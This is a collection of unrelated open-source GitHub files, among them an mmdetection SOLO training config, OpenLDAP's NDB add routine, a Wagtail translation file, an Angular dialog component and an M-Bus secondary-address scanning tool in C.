        num_classes=81,  # assumes 80 COCO classes + background -- TODO confirm framework convention
        in_channels=256,
        stacked_convs=4,
        seg_feat_channels=256,
        strides=[8, 8, 16, 32, 32],
        scale_ranges=((1, 96), (48, 192), (96, 384), (192, 768), (384, 2048)),
        sigma=0.2,
        num_grids=[40, 36, 24, 16, 12],  # grid resolution per FPN level
        cate_down_pos=0,
        with_deform=False,
        loss_ins=dict(
            type='DiceLoss',
            use_sigmoid=True,
            loss_weight=3.0),
        loss_cate=dict(
            type='FocalLoss',
            use_sigmoid=True,
            gamma=2.0,
            alpha=0.25,
            loss_weight=1.0),
    ))
# training and testing settings
train_cfg = dict()
test_cfg = dict(
    nms_pre=500,
    score_thr=0.1,
    mask_thr=0.5,
    update_thr=0.05,
    kernel='gaussian',  # gaussian/linear
    sigma=2.0,
    max_per_img=100)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
    mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
# multi-scale training: short side sampled from 640-800
train_pipeline = [
    dict(type='LoadImageFromFile'),
    dict(type='LoadAnnotations', with_bbox=True, with_mask=True),
    dict(type='Resize',
         img_scale=[(1333, 800), (1333, 768), (1333, 736),
                    (1333, 704), (1333, 672), (1333, 640)],
         multiscale_mode='value',
         keep_ratio=True),
    dict(type='RandomFlip', flip_ratio=0.5),
    dict(type='Normalize', **img_norm_cfg),
    dict(type='Pad', size_divisor=32),
    dict(type='DefaultFormatBundle'),
    dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels', 'gt_masks']),
]
# single-scale, no-flip evaluation
test_pipeline = [
    dict(type='LoadImageFromFile'),
    dict(
        type='MultiScaleFlipAug',
        img_scale=(1333, 800),
        flip=False,
        transforms=[
            dict(type='Resize', keep_ratio=True),
            dict(type='RandomFlip'),
            dict(type='Normalize', **img_norm_cfg),
            dict(type='Pad', size_divisor=32),
            dict(type='ImageToTensor', keys=['img']),
            dict(type='Collect', keys=['img']),
        ])
]
data = dict(
    imgs_per_gpu=4,
    workers_per_gpu=4,
    train=dict(
        type=dataset_type,
        ann_file=data_root + 'annotations/instances_train2017.json',
        img_prefix=data_root + 'train2017/',
        pipeline=train_pipeline),
    val=dict(
        type=dataset_type,
        ann_file=data_root + 'annotations/instances_val2017.json',
        img_prefix=data_root + 'val2017/',
        pipeline=test_pipeline),
    test=dict(
        type=dataset_type,
        ann_file=data_root + 'annotations/instances_val2017.json',
        img_prefix=data_root + 'val2017/',
        pipeline=test_pipeline))
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy: linear warmup, then step decay at epochs 27 and 33
lr_config = dict(
    policy='step',
    warmup='linear',
    warmup_iters=500,
    warmup_ratio=1.0 / 3,
    step=[27, 33])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
    interval=50,
    hooks=[
        dict(type='TextLoggerHook'),
        # dict(type='TensorboardLoggerHook')
    ])
# yapf:enable
# runtime settings
total_epochs = 36  # "3x" schedule
device_ids = range(8)
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/solo_r101_3x'
load_from = None
resume_from = None
workflow = [('train', 1)]
| {
"pile_set_name": "Github"
} |
/*
* /MathJax/jax/input/MathML/entities/y.js
*
* Copyright (c) 2012 Design Science, Inc.
*
* Part of the MathJax library.
* See http://www.mathjax.org for details.
*
* Licensed under the Apache License, Version 2.0;
* you may not use this file except in compliance with the License.
*
* http://www.apache.org/licenses/LICENSE-2.0
*/
/* Generated entity table: registers the MathML named entities starting with
   "y"/"Y" (mapping each name to its Unicode code point) on the MathML input
   jax, then signals MathJax's loader that this file has finished loading.
   Do not hand-edit the minified line below. */
(function(a){MathJax.Hub.Insert(a.Parse.Entity,{YAcy:"\u042F",YIcy:"\u0407",YUcy:"\u042E",Yacute:"\u00DD",Ycirc:"\u0176",Ycy:"\u042B",Yuml:"\u0178",yacute:"\u00FD",yacy:"\u044F",ycirc:"\u0177",ycy:"\u044B",yicy:"\u0457",yucy:"\u044E",yuml:"\u00FF"});MathJax.Ajax.loadComplete(a.entityDir+"/y.js")})(MathJax.InputJax.MathML);
| {
"pile_set_name": "Github"
} |
3085 Clan Wolf in Exile Medium Tank Second Line
Thor Artillery Vehicle (Clan),1
Hachiman Fire Support Tank (Standard),2
Zephyr Hovertank (Standard),3
Bandit (C) Hovercraft Prime,4
Bandit Hovercraft Mk 2,5
Maxim Heavy Hover Transport (Standard),6
Chaparral Missile Artillery Tank (Standard),5
Garuda Heavy VTOL (Standard),4
Epona Pursuit Tank Prime,3
Hachiman Fire Support Tank (Standard),2
Enyo Strike Tank (Standard),1
| {
"pile_set_name": "Github"
} |
import sys

# Python < 3.7 lacks module-level __getattr__ (PEP 562), so the submodule
# must be imported eagerly there; on 3.7+ it is loaded lazily on first access.
if sys.version_info < (3, 7):
    from ._marker import Marker
else:
    from _plotly_utils.importers import relative_import

    # relative_import wires up lazy attribute access for "._marker.Marker".
    __all__, __getattr__, __dir__ = relative_import(__name__, [], ["._marker.Marker"])
| {
"pile_set_name": "Github"
} |
/* add.cpp - ldap NDB back-end add routine */
/* $OpenLDAP$ */
/* This work is part of OpenLDAP Software <http://www.openldap.org/>.
*
* Copyright 2008-2020 The OpenLDAP Foundation.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted only as authorized by the OpenLDAP
* Public License.
*
* A copy of this license is available in the file LICENSE in the
* top-level directory of the distribution or, alternatively, at
* <http://www.OpenLDAP.org/license.html>.
*/
/* ACKNOWLEDGEMENTS:
* This work was initially developed by Howard Chu for inclusion
* in OpenLDAP Software. This work was sponsored by MySQL.
*/
#include "portable.h"
#include <stdio.h>
#include <ac/string.h>
#include "back-ndb.h"
/*
 * Add an entry to the NDB backend.
 *
 * Flow: schema-check the entry, open an NDB transaction, verify the parent
 * exists (handling referral/alias/subentry parents), check ACLs, allocate an
 * entry ID, write the dn2id and id2entry data, optionally produce a post-read
 * control, then commit (or roll back for no-op requests).
 */
extern "C" int
ndb_back_add(Operation *op, SlapReply *rs )
{
	struct ndb_info *ni = (struct ndb_info *) op->o_bd->be_private;
	Entry p = {0};
	Attribute poc;
	char textbuf[SLAP_TEXT_BUFLEN];
	size_t textlen = sizeof textbuf;
	AttributeDescription *children = slap_schema.si_ad_children;
	AttributeDescription *entry = slap_schema.si_ad_entry;
	NdbArgs NA;
	NdbRdns rdns;
	struct berval matched;
	struct berval pdn, pndn;

	int num_retries = 0;
	int success;

	LDAPControl **postread_ctrl = NULL;
	LDAPControl *ctrls[SLAP_MAX_RESPONSE_CONTROLS];
	int num_ctrls = 0;

	Debug(LDAP_DEBUG_ARGS, "==> " LDAP_XSTRING(ndb_back_add) ": %s\n",
		op->oq_add.rs_e->e_name.bv_val, 0, 0);

	ctrls[num_ctrls] = 0;
	NA.txn = NULL;

	/* check entry's schema */
	rs->sr_err = entry_schema_check( op, op->oq_add.rs_e, NULL,
		get_relax(op), 1, NULL, &rs->sr_text, textbuf, textlen );
	if ( rs->sr_err != LDAP_SUCCESS ) {
		Debug( LDAP_DEBUG_TRACE,
			LDAP_XSTRING(ndb_back_add) ": entry failed schema check: "
			"%s (%d)\n", rs->sr_text, rs->sr_err, 0 );
		goto return_results;
	}

	/* add opattrs to shadow as well, only missing attrs will actually
	 * be added; helps compatibility with older OL versions */
	rs->sr_err = slap_add_opattrs( op, &rs->sr_text, textbuf, textlen, 1 );
	if ( rs->sr_err != LDAP_SUCCESS ) {
		Debug( LDAP_DEBUG_TRACE,
			LDAP_XSTRING(ndb_back_add) ": entry failed op attrs add: "
			"%s (%d)\n", rs->sr_text, rs->sr_err, 0 );
		goto return_results;
	}

	/* Get our NDB handle */
	rs->sr_err = ndb_thread_handle( op, &NA.ndb );

	/*
	 * Get the parent dn and see if the corresponding entry exists.
	 */
	if ( be_issuffix( op->o_bd, &op->oq_add.rs_e->e_nname ) ) {
		pdn = slap_empty_bv;
		pndn = slap_empty_bv;
	} else {
		dnParent( &op->ora_e->e_name, &pdn );
		dnParent( &op->ora_e->e_nname, &pndn );
	}
	p.e_name = op->ora_e->e_name;
	p.e_nname = op->ora_e->e_nname;
	op->ora_e->e_id = NOID;
	rdns.nr_num = 0;
	NA.rdns = &rdns;

	if( 0 ) {
retry:	/* transaction retry */
		NA.txn->close();
		NA.txn = NULL;
		if ( op->o_abandon ) {
			rs->sr_err = SLAPD_ABANDON;
			goto return_results;
		}
		ndb_trans_backoff( ++num_retries );
	}

	NA.txn = NA.ndb->startTransaction();
	rs->sr_text = NULL;
	if( !NA.txn ) {
		Debug( LDAP_DEBUG_TRACE,
			LDAP_XSTRING(ndb_back_add) ": startTransaction failed: %s (%d)\n",
			NA.ndb->getNdbError().message, NA.ndb->getNdbError().code, 0 );
		rs->sr_err = LDAP_OTHER;
		rs->sr_text = "internal error";
		goto return_results;
	}

	/* get entry or parent */
	NA.e = &p;
	NA.ocs = NULL;
	rs->sr_err = ndb_entry_get_info( op, &NA, 0, &matched );
	switch( rs->sr_err ) {
	case 0:
		/* entry with this DN already exists */
		rs->sr_err = LDAP_ALREADY_EXISTS;
		goto return_results;
	case LDAP_NO_SUCH_OBJECT:
		/* expected: the new entry doesn't exist yet */
		break;
#if 0
	case DB_LOCK_DEADLOCK:
	case DB_LOCK_NOTGRANTED:
		goto retry;
#endif
	case LDAP_BUSY:
		rs->sr_text = "ldap server busy";
		goto return_results;
	default:
		rs->sr_err = LDAP_OTHER;
		rs->sr_text = "internal error";
		goto return_results;
	}

	/* fake up a parent entry carrying just its objectClass values */
	if ( NA.ocs ) {
		int i;

		for ( i=0; !BER_BVISNULL( &NA.ocs[i] ); i++ );
		poc.a_numvals = i;
		poc.a_desc = slap_schema.si_ad_objectClass;
		poc.a_vals = NA.ocs;
		poc.a_nvals = poc.a_vals;
		poc.a_next = NULL;
		p.e_attrs = &poc;
	}

	if ( ber_bvstrcasecmp( &pndn, &matched ) ) {
		rs->sr_matched = matched.bv_val;
		Debug( LDAP_DEBUG_TRACE,
			LDAP_XSTRING(ndb_back_add) ": parent "
			"does not exist\n", 0, 0, 0 );
		rs->sr_text = "parent does not exist";
		rs->sr_err = LDAP_NO_SUCH_OBJECT;
		if ( p.e_attrs && is_entry_referral( &p )) {
is_ref:			p.e_attrs = NULL;
			ndb_entry_get_data( op, &NA, 0 );
			rs->sr_ref = get_entry_referrals( op, &p );
			rs->sr_err = LDAP_REFERRAL;
			rs->sr_flags = REP_REF_MUSTBEFREED;
			attrs_free( p.e_attrs );
			p.e_attrs = NULL;
		}
		goto return_results;
	}
	p.e_name = pdn;
	p.e_nname = pndn;
	rs->sr_err = access_allowed( op, &p,
		children, NULL, ACL_WADD, NULL );
	if ( ! rs->sr_err ) {
		Debug( LDAP_DEBUG_TRACE,
			LDAP_XSTRING(ndb_back_add) ": no write access to parent\n",
			0, 0, 0 );
		rs->sr_err = LDAP_INSUFFICIENT_ACCESS;
		rs->sr_text = "no write access to parent";
		goto return_results;
	}

	/* reject adds under subentry/alias/referral parents */
	if ( NA.ocs ) {
		if ( is_entry_subentry( &p )) {
			/* parent is a subentry, don't allow add */
			Debug( LDAP_DEBUG_TRACE,
				LDAP_XSTRING(ndb_back_add) ": parent is subentry\n",
				0, 0, 0 );
			rs->sr_err = LDAP_OBJECT_CLASS_VIOLATION;
			rs->sr_text = "parent is a subentry";
			goto return_results;
		}

		if ( is_entry_alias( &p ) ) {
			/* parent is an alias, don't allow add */
			Debug( LDAP_DEBUG_TRACE,
				LDAP_XSTRING(ndb_back_add) ": parent is alias\n",
				0, 0, 0 );
			rs->sr_err = LDAP_ALIAS_PROBLEM;
			rs->sr_text = "parent is an alias";
			goto return_results;
		}

		if ( is_entry_referral( &p ) ) {
			/* parent is a referral, don't allow add */
			rs->sr_matched = p.e_name.bv_val;
			goto is_ref;
		}
	}

	rs->sr_err = access_allowed( op, op->ora_e,
		entry, NULL, ACL_WADD, NULL );
	if ( ! rs->sr_err ) {
		Debug( LDAP_DEBUG_TRACE,
			LDAP_XSTRING(ndb_back_add) ": no write access to entry\n",
			0, 0, 0 );
		rs->sr_err = LDAP_INSUFFICIENT_ACCESS;
		rs->sr_text = "no write access to entry";
		goto return_results;
	}

	/*
	 * Check ACL for attribute write access
	 */
	if (!acl_check_modlist(op, op->ora_e, op->ora_modlist)) {
		/* was mislabeled bdb_add: this is the NDB backend */
		Debug( LDAP_DEBUG_TRACE,
			LDAP_XSTRING(ndb_back_add) ": no write access to attribute\n",
			0, 0, 0 );
		rs->sr_err = LDAP_INSUFFICIENT_ACCESS;
		rs->sr_text = "no write access to attribute";
		goto return_results;
	}

	/* acquire entry ID */
	if ( op->ora_e->e_id == NOID ) {
		rs->sr_err = ndb_next_id( op->o_bd, NA.ndb, &op->ora_e->e_id );
		if( rs->sr_err != 0 ) {
			Debug( LDAP_DEBUG_TRACE,
				LDAP_XSTRING(ndb_back_add) ": next_id failed (%d)\n",
				rs->sr_err, 0, 0 );
			rs->sr_err = LDAP_OTHER;
			rs->sr_text = "internal error";
			goto return_results;
		}
	}

	if ( matched.bv_val )
		rdns.nr_num++;
	NA.e = op->ora_e;

	/* dn2id index */
	rs->sr_err = ndb_entry_put_info( op->o_bd, &NA, 0 );
	if ( rs->sr_err ) {
		Debug( LDAP_DEBUG_TRACE,
			LDAP_XSTRING(ndb_back_add) ": ndb_entry_put_info failed (%d)\n",
			rs->sr_err, 0, 0 );
		rs->sr_text = "internal error";
		goto return_results;
	}

	/* id2entry index */
	rs->sr_err = ndb_entry_put_data( op->o_bd, &NA );
	if ( rs->sr_err ) {
		Debug( LDAP_DEBUG_TRACE,
			LDAP_XSTRING(ndb_back_add) ": ndb_entry_put_data failed (%d) %s(%d)\n",
			rs->sr_err, NA.txn->getNdbError().message, NA.txn->getNdbError().code );
		rs->sr_text = "internal error";
		goto return_results;
	}

	/* post-read */
	if( op->o_postread ) {
		if( postread_ctrl == NULL ) {
			postread_ctrl = &ctrls[num_ctrls++];
			ctrls[num_ctrls] = NULL;
		}
		if ( slap_read_controls( op, rs, op->oq_add.rs_e,
			&slap_post_read_bv, postread_ctrl ) )
		{
			Debug( LDAP_DEBUG_TRACE,
				"<=- " LDAP_XSTRING(ndb_back_add) ": post-read "
				"failed!\n", 0, 0, 0 );
			if ( op->o_postread & SLAP_CONTROL_CRITICAL ) {
				/* FIXME: is it correct to abort
				 * operation if control fails? */
				goto return_results;
			}
		}
	}

	/* no-op requests roll the transaction back instead of committing */
	if ( op->o_noop ) {
		if (( rs->sr_err=NA.txn->execute( NdbTransaction::Rollback,
			NdbOperation::AbortOnError, 1 )) != 0 ) {
			rs->sr_text = "txn (no-op) failed";
		} else {
			rs->sr_err = LDAP_X_NO_OPERATION;
		}
	} else {
		if(( rs->sr_err=NA.txn->execute( NdbTransaction::Commit,
			NdbOperation::AbortOnError, 1 )) != 0 ) {
			rs->sr_text = "txn_commit failed";
		} else {
			rs->sr_err = LDAP_SUCCESS;
		}
	}

	if ( rs->sr_err != LDAP_SUCCESS && rs->sr_err != LDAP_X_NO_OPERATION ) {
		Debug( LDAP_DEBUG_TRACE,
			LDAP_XSTRING(ndb_back_add) ": %s : %s (%d)\n",
			rs->sr_text, NA.txn->getNdbError().message, NA.txn->getNdbError().code );
		rs->sr_err = LDAP_OTHER;
		goto return_results;
	}
	NA.txn->close();
	NA.txn = NULL;

	Debug(LDAP_DEBUG_TRACE,
		LDAP_XSTRING(ndb_back_add) ": added%s id=%08lx dn=\"%s\"\n",
		op->o_noop ? " (no-op)" : "",
		op->oq_add.rs_e->e_id, op->oq_add.rs_e->e_dn );

	rs->sr_text = NULL;
	if( num_ctrls ) rs->sr_ctrls = ctrls;

return_results:
	success = rs->sr_err;
	send_ldap_result( op, rs );

	slap_graduate_commit_csn( op );

	/* roll back and release any transaction still open on an error path */
	if( NA.txn != NULL ) {
		NA.txn->execute( NdbTransaction::Rollback );
		NA.txn->close();
	}

	if( postread_ctrl != NULL && (*postread_ctrl) != NULL ) {
		slap_sl_free( (*postread_ctrl)->ldctl_value.bv_val, op->o_tmpmemctx );
		slap_sl_free( *postread_ctrl, op->o_tmpmemctx );
	}
	return rs->sr_err;
}
| {
"pile_set_name": "Github"
} |
# SOME DESCRIPTIVE TITLE.
# Copyright (C) YEAR THE PACKAGE'S COPYRIGHT HOLDER
# This file is distributed under the same license as the PACKAGE package.
#
# Translators:
# shuhei hirota, 2019
# Tri Minh <[email protected]>, 2019
# 溝江 智徳 <[email protected]>, 2019
msgid ""
msgstr ""
"Project-Id-Version: Wagtail\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2020-08-03 18:03+0100\n"
"PO-Revision-Date: 2020-07-24 16:52+0000\n"
"Last-Translator: Matt Westcott <[email protected]>\n"
"Language-Team: Japanese (http://www.transifex.com/torchbox/wagtail/language/"
"ja/)\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"Language: ja\n"
"Plural-Forms: nplurals=1; plural=0;\n"
#, python-format
msgid "Editing %(setting_type_name)s - %(instance)s"
msgstr "%(setting_type_name)s - %(instance)s を編集"
msgid "Editing"
msgstr "編集中"
msgid "Saving…"
msgstr "保存中"
msgid "Save"
msgstr "保存"
msgid "Settings"
msgstr "設定"
msgid "This setting could not be opened because there is no site defined."
msgstr "サイトが定義されていないため、この設定を開けません。"
msgid "The setting could not be saved due to errors."
msgstr "エラーが発生したため、サイトを保存できませんでした。"
| {
"pile_set_name": "Github"
} |
---
id: version-5.3.0-extension
title: Extension
sidebar_label: Extension
original_id: extension
---
Extensions allow you to listen to specific events in the application or request/response lifecycle. You have to register an extension before the event is triggered; otherwise, the event is lost.
## Server & Client lifecycle
```js
hemera.ext('onClientPreRequest', function(hemera, next) {
// some code
next()
})
hemera.ext('onClientPostRequest', function(hemera, next) {
// some code
next()
})
hemera.ext('onServerPreHandler', function(hemera, request, reply, next) {
// some code
next()
})
hemera.ext('onServerPreRequest', function(hemera, request, reply, next) {
// some code
next()
})
hemera.ext('onServerPreResponse', function(hemera, request, reply, next) {
// some code
next()
})
```
## Application lifecycle
```js
hemera.ext('onClose', (hemera, done) => {
// some code
done()
})
hemera.ext('onAdd', addDefinition => {
// some code
addDefinition.pattern
addDefinition.schema
addDefinition.action
addDefinition.transport
})
```
## Async / Await
You can also pass an async function.
```js
hemera.ext('onServerPreHandler', async function(hemera, request, reply) {
// some code
})
hemera.ext('onClientPreRequest', async function(hemera) {
// some code
})
```
| {
"pile_set_name": "Github"
} |
{
"name": "Oracle-Application-Server",
"author": "fofa",
"version": "0.1.0",
"matches": [
{
"search": "headers",
"text": "Oracle-Application-Server"
}
]
} | {
"pile_set_name": "Github"
} |
include_rules = [
"+third_party/khronos",
"+third_party/skia",
"+ui/events",
"+ui/base/x",
"+ui/gfx",
]
specific_include_rules = {
# This is the only target that should use the osmesa.h header. Everything else
# should use the GLES2 headers from third_party/khronos/ or use gl_bindings.h to
# get access to desktop OpenGL.
"gl_surface_osmesa.cc": [
"+third_party/mesa/src/include/GL/osmesa.h",
],
# Allow us to include ANGLE's base platform implementation.
"angle_platform_impl.h": [
"+third_party/angle/include/platform/Platform.h",
],
}
| {
"pile_set_name": "Github"
} |
version: "build-{branch}-{build}"
image: Visual Studio 2017
clone_folder: c:\gopath\github.com\hashicorp\go-getter
environment:
GOPATH: c:\gopath
install:
- cmd: >-
echo %Path%
go version
go env
go get -d -v -t ./...
build_script:
- cmd: go test ./...
| {
"pile_set_name": "Github"
} |
/*
Simple DirectMedia Layer
Copyright (C) 1997-2014 Sam Lantinga <[email protected]>
This software is provided 'as-is', without any express or implied
warranty. In no event will the authors be held liable for any damages
arising from the use of this software.
Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute it
freely, subject to the following restrictions:
1. The origin of this software must not be misrepresented; you must not
claim that you wrote the original software. If you use this software
in a product, an acknowledgment in the product documentation would be
appreciated but is not required.
2. Altered source versions must be plainly marked as such, and must not be
misrepresented as being the original software.
3. This notice may not be removed or altered from any source distribution.
*/
#include "../../SDL_internal.h"
#ifndef _SDL_uikitmodes_h
#define _SDL_uikitmodes_h
#include "SDL_uikitvideo.h"
/* Driver-private data kept per display: the backing UIScreen object and
 * its scale factor. */
typedef struct
{
    UIScreen *uiscreen;
    CGFloat scale;
} SDL_DisplayData;

/* Driver-private data kept per display mode: the backing UIScreenMode
 * object and the scale associated with it. */
typedef struct
{
    UIScreenMode *uiscreenmode;
    CGFloat scale;
} SDL_DisplayModeData;

/* Reports whether the given screen is in a landscape orientation
 * (per the function name; implementation lives in SDL_uikitmodes.m). */
extern SDL_bool UIKit_IsDisplayLandscape(UIScreen *uiscreen);

/* Video-device entry points for display/mode enumeration and selection. */
extern int UIKit_InitModes(_THIS);
extern void UIKit_GetDisplayModes(_THIS, SDL_VideoDisplay * display);
extern int UIKit_SetDisplayMode(_THIS, SDL_VideoDisplay * display, SDL_DisplayMode * mode);
extern void UIKit_QuitModes(_THIS);
#endif /* _SDL_uikitmodes_h */
/* vi: set ts=4 sw=4 expandtab: */
| {
"pile_set_name": "Github"
} |
; Test to ensure that non-prevailing weak aliasee is kept as a weak definition
; when the alias is not dead.
; RUN: opt -module-summary %s -o %t1.bc
; RUN: llvm-lto2 run %t1.bc \
; RUN: -r=%t1.bc,__a,lx \
; RUN: -r=%t1.bc,__b,l \
; RUN: -r=%t1.bc,a,plx \
; RUN: -r=%t1.bc,b,pl \
; RUN: -o %t2.o -save-temps
; Check that __a is kept as a weak def. __b can be dropped since its alias is
; not live and will also be dropped.
; RUN: llvm-dis %t2.o.1.1.promote.bc -o - | FileCheck %s
; CHECK: define weak hidden void @__a
; CHECK: declare hidden void @__b
; CHECK: declare void @b
target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"
@a = hidden alias void (), void ()* @__a
define weak hidden void @__a() {
entry:
ret void
}
@b = hidden alias void (), void ()* @__b
define weak hidden void @__b() {
entry:
ret void
}
| {
"pile_set_name": "Github"
} |
import { ChangeDetectionStrategy, ChangeDetectorRef, Component } from "@angular/core";
import { MatDialogRef } from "@angular/material/dialog";
import { autobind } from "@batch-flask/core";
import { ConfirmationDialog } from "@batch-flask/ui";
import { Job } from "app/models";
@Component({
    selector: "bl-disable-job-dialog",
    templateUrl: "disable-job-dialog.html",
    changeDetection: ChangeDetectionStrategy.OnPush,
})
export class DisableJobDialogComponent extends ConfirmationDialog<string> {
    /** Jobs the user is about to disable; drives the confirmation title. */
    public set jobs(jobs: Job[]) {
        this._jobs = jobs;
        this.changeDetector.markForCheck();
    }

    /** Human-readable description of the currently selected task action. */
    public actionDescription: string = "";

    /** What to do with running tasks: "requeue", "terminate" or "wait". */
    public set taskAction(action: string) {
        this.onChange(action);
        this._taskAction = action;
        this.changeDetector.markForCheck();
    }
    public get taskAction() { return this._taskAction; }

    private _taskAction: string = "requeue";
    private _jobs: Job[] = [];

    constructor(public dialogRef: MatDialogRef<DisableJobDialogComponent>, private changeDetector: ChangeDetectorRef) {
        super();
        this.taskAction = "requeue";
    }

    /** Confirms the dialog, resolving with the chosen task action. */
    @autobind()
    public ok() {
        this.markAsConfirmed(this.taskAction);
    }

    /** Confirmation title; pluralized when more than one job is selected. */
    public get title() {
        const size = this._jobs.length;
        if (size > 1) {
            return `Are you sure you want to disable ${size} jobs`;
        } else {
            const job = this._jobs.first();
            return `Are you sure you want to disable job ${job && job.id}`;
        }
    }

    /**
     * Updates actionDescription to match the selected action.
     * (Parameter was previously untyped; it is always a string.)
     */
    public onChange(action: string) {
        switch (action) {
            case "requeue":
                this.actionDescription = "Terminate running tasks and requeue them. "
                    + "The tasks will run again when the job is enabled.";
                break;
            case "terminate":
                this.actionDescription = "Terminate running tasks. The tasks will not run again.";
                break;
            case "wait":
                this.actionDescription = "Allow currently running tasks to complete.";
                break;
            default:
                this.actionDescription = "";
                break;
        }
    }
}
| {
"pile_set_name": "Github"
} |
//------------------------------------------------------------------------------
// Copyright (C) 2011, Robert Johansson, Raditex AB
// All rights reserved.
//
// rSCADA
// http://www.rSCADA.se
// [email protected]
//
//------------------------------------------------------------------------------
#include <string.h>
#include <stdio.h>
#include <mbus/mbus.h>
static int debug = 0;
//
// init slave to get really the beginning of the records
//
/*
 * Prime the slaves so the next read starts at the beginning of their
 * records: ping the network layer, then broadcast a second SND_NKE in
 * case the first frame was lost. Returns 1 on success, 0 on failure.
 */
int
init_slaves(mbus_handle *handle)
{
    if (debug)
    {
        printf("%s: debug: sending init frame #1\n", __PRETTY_FUNCTION__);
    }

    if (mbus_send_ping_frame(handle, MBUS_ADDRESS_NETWORK_LAYER, 1) == -1)
        return 0;

    /* resend SND_NKE as a broadcast; the first ping may have been lost */
    if (debug)
    {
        printf("%s: debug: sending init frame #2\n", __PRETTY_FUNCTION__);
    }

    return (mbus_send_ping_frame(handle, MBUS_ADDRESS_BROADCAST_NOREPLY, 1) == -1) ? 0 : 1;
}
//------------------------------------------------------------------------------
// Scan for devices using secondary addressing.
//------------------------------------------------------------------------------
/*
 * Scan for M-Bus devices using secondary addressing.
 *
 * Usage: scan [-d] [-b BAUDRATE] device [address-mask]
 *
 * Fixes over the previous revision: the unused `frame`/`reply` objects are
 * gone (the mbus_frame_new() result was never used and leaked), and the
 * serial handle is now disconnected/freed on every error path once it has
 * been created.
 */
int
main(int argc, char **argv)
{
    char *device, *addr_mask = NULL;
    long baudrate = 9600;
    mbus_handle *handle = NULL;

    /* Parse the small fixed set of argument layouts by hand. */
    if (argc == 2)
    {
        device = argv[1];
        addr_mask = strdup("FFFFFFFFFFFFFFFF");
    }
    else if (argc == 3 && strcmp(argv[1], "-d") == 0)
    {
        device = argv[2];
        addr_mask = strdup("FFFFFFFFFFFFFFFF");
        debug = 1;
    }
    else if (argc == 3)
    {
        device = argv[1];
        addr_mask = strdup(argv[2]);
    }
    else if (argc == 4 && strcmp(argv[1], "-d") == 0)
    {
        device = argv[2];
        addr_mask = strdup(argv[3]);
        debug = 1;
    }
    else if (argc == 4 && strcmp(argv[1], "-b") == 0)
    {
        baudrate = atol(argv[2]);
        device = argv[3];
        addr_mask = strdup("FFFFFFFFFFFFFFFF");
    }
    else if (argc == 5 && strcmp(argv[1], "-d") == 0 && strcmp(argv[2], "-b") == 0)
    {
        baudrate = atol(argv[3]);
        device = argv[4];
        addr_mask = strdup("FFFFFFFFFFFFFFFF");
        debug = 1;
    }
    else if (argc == 5 && strcmp(argv[1], "-b") == 0)
    {
        baudrate = atol(argv[2]);
        device = argv[3];
        addr_mask = strdup(argv[4]);
    }
    else if (argc == 6 && strcmp(argv[1], "-d") == 0)
    {
        baudrate = atol(argv[3]);
        device = argv[4];
        addr_mask = strdup(argv[5]);
        debug = 1;
    }
    else
    {
        fprintf(stderr, "usage: %s [-d] [-b BAUDRATE] device [address-mask]\n", argv[0]);
        fprintf(stderr, "\toptional flag -d for debug printout\n");
        fprintf(stderr, "\toptional flag -b for selecting baudrate\n");
        fprintf(stderr, "\trestrict the search by supplying an optional address mask on the form\n");
        fprintf(stderr, "\t'FFFFFFFFFFFFFFFF' where F is a wildcard character\n");
        return 0;
    }

    if (addr_mask == NULL)
    {
        fprintf(stderr, "Failed to allocate address mask.\n");
        return 1;
    }

    if (mbus_is_secondary_address(addr_mask) == 0)
    {
        fprintf(stderr, "Misformatted secondary address mask. Must be 16 character HEX number.\n");
        free(addr_mask);
        return 1;
    }

    if ((handle = mbus_context_serial(device)) == NULL)
    {
        fprintf(stderr, "Could not initialize M-Bus context: %s\n", mbus_error_str());
        free(addr_mask);
        return 1;
    }

    if (debug)
    {
        mbus_register_send_event(handle, &mbus_dump_send_event);
        mbus_register_recv_event(handle, &mbus_dump_recv_event);
    }

    if (mbus_connect(handle) == -1)
    {
        fprintf(stderr,"Failed to setup connection to M-bus gateway\n");
        mbus_context_free(handle);   /* was leaked before */
        free(addr_mask);
        return 1;
    }

    if (mbus_serial_set_baudrate(handle, baudrate) == -1)
    {
        fprintf(stderr, "Failed to set baud rate.\n");
        mbus_disconnect(handle);     /* was leaked before */
        mbus_context_free(handle);
        free(addr_mask);
        return 1;
    }

    if (init_slaves(handle) == 0)
    {
        mbus_disconnect(handle);     /* was leaked before */
        mbus_context_free(handle);
        free(addr_mask);
        return 1;
    }

    mbus_scan_2nd_address_range(handle, 0, addr_mask);

    mbus_disconnect(handle);
    mbus_context_free(handle);
    //printf("Summary: Tried %ld address masks and found %d devices.\n", probe_count, match_count);
    free(addr_mask);
    return 0;
}
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
/*!
* \file canonicalize_ops.cc
* \brief Canonicalize special operators to basic operators.
This can simplify latter analysis. (e.g. Expand bias_add to expand_dims and broadcast_add.)
*/
#include <tvm/relay/analysis.h>
#include <tvm/relay/attrs/nn.h>
#include <tvm/relay/expr_functor.h>
#include <tvm/relay/op.h>
#include <tvm/relay/transform.h>
#include "pattern_util.h"
namespace tvm {
namespace relay {
